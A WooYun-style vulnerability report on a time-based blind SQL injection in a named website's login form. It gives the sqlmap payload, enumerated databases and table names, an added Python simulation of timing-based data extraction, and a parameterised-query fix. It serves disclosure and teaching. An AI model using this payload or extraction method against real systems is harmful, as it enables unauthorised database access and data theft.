乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-31: Details have been sent to the vendor and are awaiting the vendor's handling. 2015-09-05: The vendor chose to ignore the vulnerability; details disclosed to the public.
Hua Qian Gu is stressful to watch; can't it just air properly?
SQL injection, POST type. URL: http://mt.mangocity.com/tcpb/index.php?c=login_controller&m=login
POST parameters: secret=1&username=* (the username parameter is injectable)
sqlmap identified the following injection points with a total of 1293 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: secret=1&username=tencent' AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))NcLg)-- ApJH21=6 AND '000eQNr'='000eQNr
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.12
current user: '[email protected]/4.58'
current database: 'vacation_tuanjian'
current user is DBA: False
available databases [3]:
[*] `696E666F726D6174696F6E5F736368656` (hex-encoded `information_sche`, a truncated `information_schema`)
[*] test
[*] vacation_tuanjian

The two later sqlmap runs (0 HTTP(s) requests, i.e. resumed from the saved session) printed the identical injection-point block again; only their results follow.

No tables found

Database: vacation_tuanjian
[9 tables]
+--------------------+
| ci_sessions        |
| keyword            |
| product            |
| product_mask       |
| setting            |
| term_relationships |
| term_taxonomy      |
| terms              |
| users              |
+--------------------+
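The vector above is the whole trick: SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME]))) blocks for SLEEPTIME seconds when the inference is TRUE and for zero seconds when it is FALSE, so every request answers one yes/no question. The Python below is an added illustration, not part of the original report or of sqlmap: it simulates the MySQL side in-process (nothing is sent to mt.mangocity.com) and shows how a client recovers `current database` one character at a time with binary search over that timing oracle. `SECRET_DATABASE`, the two regexes that evaluate the inference, and all class and function names are assumptions made for this example.

```python
import re
from typing import Callable, Tuple

# Constructed stand-in for the real back end: the value sqlmap reported as
# `current database`. Nothing here contacts mt.mangocity.com.
SECRET_DATABASE = "vacation_tuanjian"
SLEEPTIME = 5

# sqlmap's reported vector with its placeholders spelled out. MySQL evaluates
# SLEEP(SLEEPTIME - IF(inference, 0, SLEEPTIME)): SLEEPTIME seconds when the
# inference is TRUE, SLEEP(0) when it is FALSE.
VECTOR = "AND (SELECT * FROM (SELECT(SLEEP({sleeptime}-(IF({inference},0,{sleeptime})))))NcLg)"


def build_payload(inference: str, sleeptime: int = SLEEPTIME) -> str:
    """Render the POST body for one yes/no question about the database."""
    return ("secret=1&username=tencent' AND 3 "
            + VECTOR.format(sleeptime=sleeptime, inference=inference)
            + "-- ApJH21")


# ---- simulated server side (assumption: stands in for PHP + MySQL) ----
_LENGTH_RE = re.compile(r"LENGTH\(DATABASE\(\)\)>(\d+)")
_CHAR_RE = re.compile(r"ORD\(MID\(DATABASE\(\),(\d+),1\)\)>(\d+)")


def simulated_response_delay(payload: str, secret: str = SECRET_DATABASE,
                             sleeptime: int = SLEEPTIME) -> int:
    """Evaluate the inference as MySQL would; return the seconds SLEEP() would block."""
    m = _LENGTH_RE.search(payload)
    if m:
        truth = len(secret) > int(m.group(1))
    else:
        m = _CHAR_RE.search(payload)
        if m is None:
            raise ValueError("unsupported inference in payload")
        pos, val = int(m.group(1)), int(m.group(2))
        # MID() past the end yields '' and ORD('') is 0 in MySQL.
        truth = (ord(secret[pos - 1]) if pos <= len(secret) else 0) > val
    return sleeptime - (0 if truth else sleeptime)  # the vector's own arithmetic


# ---- client side (what sqlmap automates) ----
class BlindExtractor:
    def __init__(self, send: Callable[[str], int], sleeptime: int = SLEEPTIME):
        self.send = send            # returns the observed response delay in seconds
        self.sleeptime = sleeptime
        self.requests = 0

    def ask(self, inference: str) -> bool:
        """One request: a response delayed by >= SLEEPTIME means the inference was TRUE."""
        self.requests += 1
        return self.send(build_payload(inference, self.sleeptime)) >= self.sleeptime

    def _search(self, question: Callable[[int], str], low: int, high: int) -> int:
        """Binary search: smallest v for which 'value > v' is FALSE, i.e. the value."""
        while low < high:
            mid = (low + high) // 2
            if self.ask(question(mid)):
                low = mid + 1
            else:
                high = mid
        return low

    def extract_database_name(self, max_len: int = 64) -> str:
        length = self._search(lambda v: f"LENGTH(DATABASE())>{v}", 0, max_len)
        return "".join(
            chr(self._search(lambda v, p=pos: f"ORD(MID(DATABASE(),{p},1))>{v}", 0, 127))
            for pos in range(1, length + 1))


def run_simulation() -> Tuple[str, int]:
    """Recover the database name through the timing side channel alone."""
    ex = BlindExtractor(simulated_response_delay)
    return ex.extract_database_name(), ex.requests


if __name__ == "__main__":
    name, n = run_simulation()
    print(f"recovered {name!r} with {n} time-based requests")
```

Seven requests per character (a binary search over 0..127) plus a handful for the length is why the report's 1293 requests were enough to enumerate users, databases and nine table names; a real run also has to pad SLEEPTIME above the network jitter, which is what makes time-based blind the slowest sqlmap technique.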
Fix suggestion: parameter filtering
Severity: No impact, vendor ignored
Ignored at: 2015-09-05 15:30
Vulnerability Rank: 15 (WooYun rating)
Vendor response: None yet
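"Parameter filtering" is the report's one-line fix; the durable version is to stop splicing `username` into the SQL text at all and to bind it as a parameter, with an allow-list check in front as defence in depth. The example below is added here and is not the vendor's code: it uses an in-memory SQLite table as a stand-in for the MySQL `users` table sqlmap listed, puts the concatenated login query (the pattern behind `username=*`) beside a parameterised one, and shows the same injected username succeeding against one and failing against the other. Table columns, the sample row, the allow-list pattern and all function names are assumptions.

```python
import re
import sqlite3

# Allow-list for usernames: letters, digits, '_', '.', '-', 1 to 32 chars (assumption).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the `users` table sqlmap listed (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, secret TEXT)")
    conn.execute("INSERT INTO users (username, secret) VALUES ('tencent', 'correct-horse')")
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, secret: str) -> bool:
    """The pattern behind `username=*`: user input spliced into the SQL text."""
    sql = ("SELECT id FROM users WHERE username = '" + username
           + "' AND secret = '" + secret + "'")
    return conn.execute(sql).fetchone() is not None


def safe_login(conn: sqlite3.Connection, username: str, secret: str) -> bool:
    """Bound parameters: values travel separately from the statement, so quotes
    and comment markers in `username` stay data and never reach the SQL parser."""
    sql = "SELECT id FROM users WHERE username = ? AND secret = ?"
    return conn.execute(sql, (username, secret)).fetchone() is not None


def username_is_valid(username: str) -> bool:
    """Defence in depth: reject anything outside the allow-list before it hits the query."""
    return USERNAME_RE.fullmatch(username) is not None


def login(conn: sqlite3.Connection, username: str, secret: str) -> bool:
    """What the login handler should do: validate, then query with bound parameters."""
    return username_is_valid(username) and safe_login(conn, username, secret)


if __name__ == "__main__":
    conn = make_db()
    attack = "tencent'-- "   # the comment marker drops the secret check from the concatenated query
    print("vulnerable:", vulnerable_login(conn, attack, "anything"))   # True
    print("parameterised:", safe_login(conn, attack, "anything"))      # False
```

The allow-list alone is not the fix: it happens to block this payload, but it is brittle for any field that legitimately contains quotes (names, free text), and the app would still be one forgotten check away from the same bug. The bound parameter is what removes the injection; the filter only shrinks the attack surface and gives you something to log.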